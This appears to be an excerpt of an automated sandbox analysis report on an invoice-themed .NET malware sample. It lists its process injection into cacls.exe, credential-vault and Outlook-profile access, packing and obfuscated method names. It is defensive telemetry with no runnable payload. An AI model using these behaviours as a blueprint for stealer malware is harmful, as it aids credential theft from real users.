Source: unknown	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cacls.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: FACTURA 24V70 VINS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FACTURA 24V70 VINS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cacls.pdbGCTL source: FACTURA 24V70 VINS.exe, 00000003.00000002.3037746127.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4648456843.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cacls.pdb source: FACTURA 24V70 VINS.exe, 00000003.00000002.3037746127.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4648456843.0000000000718000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fXZvHKoWCzop.exe, 0000000B.00000000.2950556668.0000000000E5E000.00000002.00000001.01000000.0000000C.sdmp, fXZvHKoWCzop.exe, 0000000E.00000002.4649752534.0000000000E5E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: FACTURA 24V70 VINS.exe, 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000003.3054296434.000000000351F000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000003.3051687019.0000000003364000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FACTURA 24V70 VINS.exe, FACTURA 24V70 VINS.exe, 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 0000000C.00000003.3054296434.000000000351F000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 0000000C.00000003.3051687019.0000000003364000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	.Net Code: ql8dGRb77A System.Reflection.Assembly.Load(byte[])
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	.Net Code: ql8dGRb77A System.Reflection.Assembly.Load(byte[])
Source: 1.2.FACTURA 24V70 VINS.exe.4c0ccf8.0.raw.unpack, uC1ukaNOvDSNVPcieP.cs	.Net Code: ql8dGRb77A System.Reflection.Assembly.Load(byte[])
Source: 1.2.FACTURA 24V70 VINS.exe.74e0000.2.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056E3739 push 0C05h; iretd	1_2_056E3745
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EEE43 push es; retf	1_2_056EEE4A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EFB57 push cs; retf	1_2_056EFB5A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EFB11 push cs; retf	1_2_056EFB12
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_056EFACB push cs; retf	1_2_056EFAD2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076048D0 push eax; iretd	1_2_076048D1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626769 push esp; retf	1_2_0762676A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07623723 push eax; retf	1_2_07623729
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076266FB push ebx; retf	1_2_07626702
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0762754B pushad ; retf	1_2_07627552
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07627549 pushad ; retf	1_2_0762754A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076285CB push eax; retf	1_2_076285D1
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626583 push eax; retf	1_2_0762658A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626581 push eax; retf	1_2_07626582
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_076264B8 push eax; retf	1_2_076264BA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0762F1CB pushfd ; retf	1_2_0762F1D2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_0762F1C9 pushfd ; retf	1_2_0762F1CA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620FE1 push ds; retf	1_2_07620FE2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620FFB push ds; retf	1_2_07621002
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620E53 push ds; retf	1_2_07620E5A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620E50 push ds; retf	1_2_07620E52
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07620EF9 push ds; retf	1_2_07620EFA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626D03 push edi; retf	1_2_07626D0A
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626D00 push edi; retf	1_2_07626D02
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626C20 push esi; retf	1_2_07626C22
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07622C38 pushad ; retf	1_2_07622C39
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626BB0 push esi; retf	1_2_07626BB2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626A71 push ebp; retf	1_2_07626A72
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626AB3 push ebp; retf	1_2_07626ABA
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626AB1 push esi; retf	1_2_07626AB2
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 1_2_07626A90 push ebp; retf	1_2_07626A92

Source: FACTURA 24V70 VINS.exe

Static PE information: section name: .text entropy: 7.719487487198971

Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, UcUWFu8W6ceNysrd4I.cs	High entropy of concatenated method names: 'YnaGGmBZ4', 'M8axDFF9O', 'BedujmrMZ', 'aBUAjXwI5', 'WTU7JTVGf', 'jUIvRjPL4', 'bXo48bPw3lANkaUnUo', 'A7ReepZ7pUtf0ITppJ', 'RhiMlkIFD', 'MXKoPdY6w'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, qyf5abrvsyY6ONiZon.cs	High entropy of concatenated method names: 'Ttbc5t2tFW', 'ungcS0WG6G', 'yZFcd9GBQ5', 'VYQcJ6JClo', 'o7oc8tWrlE', 'OWWcyF8V59', 'x8qcO60Pa5', 'RHpM07lkLR', 'ST3MmB6mHF', 'qNIMDl2rJU'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, LqaaTDCXXcs1Bkatoc.cs	High entropy of concatenated method names: 'KRPMVHggqf', 'f4EMiN41Xv', 'iGsM3cYMUJ', 'eiPMQlMf8p', 'xBNMj8aOEd', 'hZvMaIQGmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, tLsmDfm2sEXvEoepHD.cs	High entropy of concatenated method names: 'icUOgwaEkH', 'KIvOT0kRFd', 'g7VOG13hlW', 'TPPOxdx46W', 'XZ3Ou1PC0t', 'vbFOATYUXc', 'DTJO7Emecd', 'yEKOv4ZfB0', 'YHCP9M5i5fkUj6QwpSe', 'EPPgvx5HRs9BjQGiGlP'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, HRqAi5zo58cVIJcpge.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vY5c4EJ1CB', 'Hv4cwTYwY2', 'rj9c6totx1', 'oPIclRD4tj', 'w6AcMO9OWE', 'tC4ccrZBEG', 'UoOcoxtZCx'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, IqK8bsYVEt7haTtUqc.cs	High entropy of concatenated method names: 'PeU8j4GV4l', 'q9c8nild0U', 'tCD8NMVWDs', 'dGe8WJPKGb', 'Jds8eX6cXh', 'uEL8R6frcH', 'WLJ80Gh8Y0', 'mg28mYsYG3', 'Qbj8DecTBB', 'cKv8EGOI33'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, TOsVUbRsuCOcpGkcfD.cs	High entropy of concatenated method names: 'F8Ewk1Pgpo', 'XufwBSxkFG', 'erCwjytQXa', 'VL9wn8UV5V', 'lMRwiGYBWF', 'GXpw36PXP0', 'gr8wQsU9he', 'dWiwao1yuE', 'ohJwUA8uGy', 'KabwFwp2NC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, lmy47KswpkjG5DQ3SN.cs	High entropy of concatenated method names: 'Dispose', 'jMJ5DG8n9i', 'TS1qi2822s', 'TQ0XXOnXYg', 'gUF5EV97RQ', 'GOt5zrVj8F', 'ProcessDialogKey', 'H8wq9SmPRh', 'x1kq5qeofQ', 'yETqqSYqU6'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, mPWDn6SsOiw3DbUmrS.cs	High entropy of concatenated method names: 'p74MJayRl6', 'ttZM8gsUDY', 'yKrMr6svkE', 'uWrMyQYKjh', 'vPSMOgMwlE', 'z0PMZISj5A', 'JKFMbRRnhm', 'cL1MCqms5B', 'JKcM1a2o1n', 'SrTMPJGVhC'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, aVKKOBMHnAN631LZaN.cs	High entropy of concatenated method names: 'TGhZJDmURb', 'A2RZrsZJK0', 'bPJZOk4pBm', 'dOgOEPLCXk', 'eEWOzOKKuM', 'exmZ94M670', 'ofCZ5NmQv1', 'v6qZquuEDb', 'ebtZSRK0fk', 'BkHZd1qERJ'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uC1ukaNOvDSNVPcieP.cs	High entropy of concatenated method names: 'SGDSLNWPCw', 'MSqSJpCI7o', 'tNpS8ITiTd', 'lNpSrDcBfH', 'BmgSy6xAQH', 'PL8SOtqvFZ', 'O9RSZEDZmC', 'JSCSbDslg6', 'N6wSCZr80t', 'LOOS1Y6hbo'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, Ep1iiUPZ9eVGuMqeAM.cs	High entropy of concatenated method names: 'BuWZTqlpUN', 'uyhZIRqvTm', 'xPxZGuMh3x', 'RpQZx5GpYx', 'CoNZs2Pr1y', 'UsHZulDhgV', 'jwNZARYJpP', 'Ww0ZY0DcYN', 'wrQZ782ula', 'tVFZvW1jRM'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, pRe6iEGYFy6rjPN2Fu.cs	High entropy of concatenated method names: 'C255ZsZSyo', 'yhF5bllatY', 'T9F518kZ7R', 'Lwy5Pj7u9s', 'H5x5wgda6G', 'bHR56qGElK', 'xcZX0Ru7XAOohVQfbR', 'UKa7YY3DanpgBMFBRZ', 'iUj55dhNhO', 'mUC5SlowUt'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, qDR1nokqdRKXT55LttR.cs	High entropy of concatenated method names: 'lj1cTPg7HP', 'JjFcInq3ix', 'Sl9cGNFE3i', 'TidcxjaA65', 'EYacsjGkRM', 'GDvcu1ajok', 'Hm0cAvlT5Q', 'opacY5Fib6', 'zvOc7EcHuK', 'd8ZcvC4xfH'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, cOTBnJXWhHoN3L5kKB.cs	High entropy of concatenated method names: 'k5vrxwNUyb', 'xOlruHfxc6', 'uB7rYVURmW', 'OWlr73BrZH', 'XuTrw3uZan', 'y2Gr6PKRcy', 'VRjrl7oMZZ', 'peDrM3mbj8', 'aPYrcvADSF', 'dWAroDIPwy'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, fy8m61vnZRqwT5qopV.cs	High entropy of concatenated method names: 'ToString', 'wSV6hws7K0', 'YPM6iItO4n', 'y9563Lh7nt', 'Jae6QfNrxe', 'T8Y6aBoqe3', 'trD6UppuJZ', 'BFS6FH6Cgy', 'g9V6Kk2Ut1', 'JqD6pHKLhu'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, i2sRDQQLDPWO0A5Knr.cs	High entropy of concatenated method names: 'pkq4YFu08A', 'jWi47LwPGY', 'e8N4VUp8y8', 'JPy4iutZy0', 'znE4QI6VGJ', 'YYM4aDYuvb', 'o9S4FL44dL', 'oC24K33JtO', 'esU4kx2lxu', 'TgQ4h261We'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, rdjnA5kHW6FVW1v22F5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WjIojideG0', 'PYtontZNTy', 'p1SoNKlMH3', 'qsUoWeWVuT', 'G2KoeiZKAY', 'Eb9oRuptvr', 'QRdo0uIdfK'
Source: 1.2.FACTURA 24V70 VINS.exe.4c94b18.1.raw.unpack, uP28d87bb3JInt4slZ.cs	High entropy of concatenated method names: 'iFiOLEkFbu', 'FowO8oxcmm', 'zTUOyyggSY', 'D3EOZi4XJE', 'UBlObZJK4g', 'MdNyeaZGBo', 'D8XyRfTBBQ', 'VQhy027nKb', 'qdKymNrSge', 'Xg5yDu0yUP'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, UcUWFu8W6ceNysrd4I.cs	High entropy of concatenated method names: 'YnaGGmBZ4', 'M8axDFF9O', 'BedujmrMZ', 'aBUAjXwI5', 'WTU7JTVGf', 'jUIvRjPL4', 'bXo48bPw3lANkaUnUo', 'A7ReepZ7pUtf0ITppJ', 'RhiMlkIFD', 'MXKoPdY6w'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, qyf5abrvsyY6ONiZon.cs	High entropy of concatenated method names: 'Ttbc5t2tFW', 'ungcS0WG6G', 'yZFcd9GBQ5', 'VYQcJ6JClo', 'o7oc8tWrlE', 'OWWcyF8V59', 'x8qcO60Pa5', 'RHpM07lkLR', 'ST3MmB6mHF', 'qNIMDl2rJU'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, LqaaTDCXXcs1Bkatoc.cs	High entropy of concatenated method names: 'KRPMVHggqf', 'f4EMiN41Xv', 'iGsM3cYMUJ', 'eiPMQlMf8p', 'xBNMj8aOEd', 'hZvMaIQGmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, tLsmDfm2sEXvEoepHD.cs	High entropy of concatenated method names: 'icUOgwaEkH', 'KIvOT0kRFd', 'g7VOG13hlW', 'TPPOxdx46W', 'XZ3Ou1PC0t', 'vbFOATYUXc', 'DTJO7Emecd', 'yEKOv4ZfB0', 'YHCP9M5i5fkUj6QwpSe', 'EPPgvx5HRs9BjQGiGlP'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, HRqAi5zo58cVIJcpge.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vY5c4EJ1CB', 'Hv4cwTYwY2', 'rj9c6totx1', 'oPIclRD4tj', 'w6AcMO9OWE', 'tC4ccrZBEG', 'UoOcoxtZCx'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, IqK8bsYVEt7haTtUqc.cs	High entropy of concatenated method names: 'PeU8j4GV4l', 'q9c8nild0U', 'tCD8NMVWDs', 'dGe8WJPKGb', 'Jds8eX6cXh', 'uEL8R6frcH', 'WLJ80Gh8Y0', 'mg28mYsYG3', 'Qbj8DecTBB', 'cKv8EGOI33'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, TOsVUbRsuCOcpGkcfD.cs	High entropy of concatenated method names: 'F8Ewk1Pgpo', 'XufwBSxkFG', 'erCwjytQXa', 'VL9wn8UV5V', 'lMRwiGYBWF', 'GXpw36PXP0', 'gr8wQsU9he', 'dWiwao1yuE', 'ohJwUA8uGy', 'KabwFwp2NC'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, lmy47KswpkjG5DQ3SN.cs	High entropy of concatenated method names: 'Dispose', 'jMJ5DG8n9i', 'TS1qi2822s', 'TQ0XXOnXYg', 'gUF5EV97RQ', 'GOt5zrVj8F', 'ProcessDialogKey', 'H8wq9SmPRh', 'x1kq5qeofQ', 'yETqqSYqU6'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, mPWDn6SsOiw3DbUmrS.cs	High entropy of concatenated method names: 'p74MJayRl6', 'ttZM8gsUDY', 'yKrMr6svkE', 'uWrMyQYKjh', 'vPSMOgMwlE', 'z0PMZISj5A', 'JKFMbRRnhm', 'cL1MCqms5B', 'JKcM1a2o1n', 'SrTMPJGVhC'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, aVKKOBMHnAN631LZaN.cs	High entropy of concatenated method names: 'TGhZJDmURb', 'A2RZrsZJK0', 'bPJZOk4pBm', 'dOgOEPLCXk', 'eEWOzOKKuM', 'exmZ94M670', 'ofCZ5NmQv1', 'v6qZquuEDb', 'ebtZSRK0fk', 'BkHZd1qERJ'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, uC1ukaNOvDSNVPcieP.cs	High entropy of concatenated method names: 'SGDSLNWPCw', 'MSqSJpCI7o', 'tNpS8ITiTd', 'lNpSrDcBfH', 'BmgSy6xAQH', 'PL8SOtqvFZ', 'O9RSZEDZmC', 'JSCSbDslg6', 'N6wSCZr80t', 'LOOS1Y6hbo'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, Ep1iiUPZ9eVGuMqeAM.cs	High entropy of concatenated method names: 'BuWZTqlpUN', 'uyhZIRqvTm', 'xPxZGuMh3x', 'RpQZx5GpYx', 'CoNZs2Pr1y', 'UsHZulDhgV', 'jwNZARYJpP', 'Ww0ZY0DcYN', 'wrQZ782ula', 'tVFZvW1jRM'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, pRe6iEGYFy6rjPN2Fu.cs	High entropy of concatenated method names: 'C255ZsZSyo', 'yhF5bllatY', 'T9F518kZ7R', 'Lwy5Pj7u9s', 'H5x5wgda6G', 'bHR56qGElK', 'xcZX0Ru7XAOohVQfbR', 'UKa7YY3DanpgBMFBRZ', 'iUj55dhNhO', 'mUC5SlowUt'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, qDR1nokqdRKXT55LttR.cs	High entropy of concatenated method names: 'lj1cTPg7HP', 'JjFcInq3ix', 'Sl9cGNFE3i', 'TidcxjaA65', 'EYacsjGkRM', 'GDvcu1ajok', 'Hm0cAvlT5Q', 'opacY5Fib6', 'zvOc7EcHuK', 'd8ZcvC4xfH'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, cOTBnJXWhHoN3L5kKB.cs	High entropy of concatenated method names: 'k5vrxwNUyb', 'xOlruHfxc6', 'uB7rYVURmW', 'OWlr73BrZH', 'XuTrw3uZan', 'y2Gr6PKRcy', 'VRjrl7oMZZ', 'peDrM3mbj8', 'aPYrcvADSF', 'dWAroDIPwy'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, fy8m61vnZRqwT5qopV.cs	High entropy of concatenated method names: 'ToString', 'wSV6hws7K0', 'YPM6iItO4n', 'y9563Lh7nt', 'Jae6QfNrxe', 'T8Y6aBoqe3', 'trD6UppuJZ', 'BFS6FH6Cgy', 'g9V6Kk2Ut1', 'JqD6pHKLhu'
Source: 1.2.FACTURA 24V70 VINS.exe.7d50000.3.raw.unpack, i2sRDQQLDPWO0A5Knr.cs	High entropy of concatenated method names: 'pkq4YFu08A', 'jWi47LwPGY', 'e8N4VUp8y8', 'JPy4iutZy0', 'znE4QI6VGJ', 'YYM4aDYuvb', 'o9S4FL44dL', 'oC24K33JtO', 'esU4kx2lxu', 'TgQ4h261We'
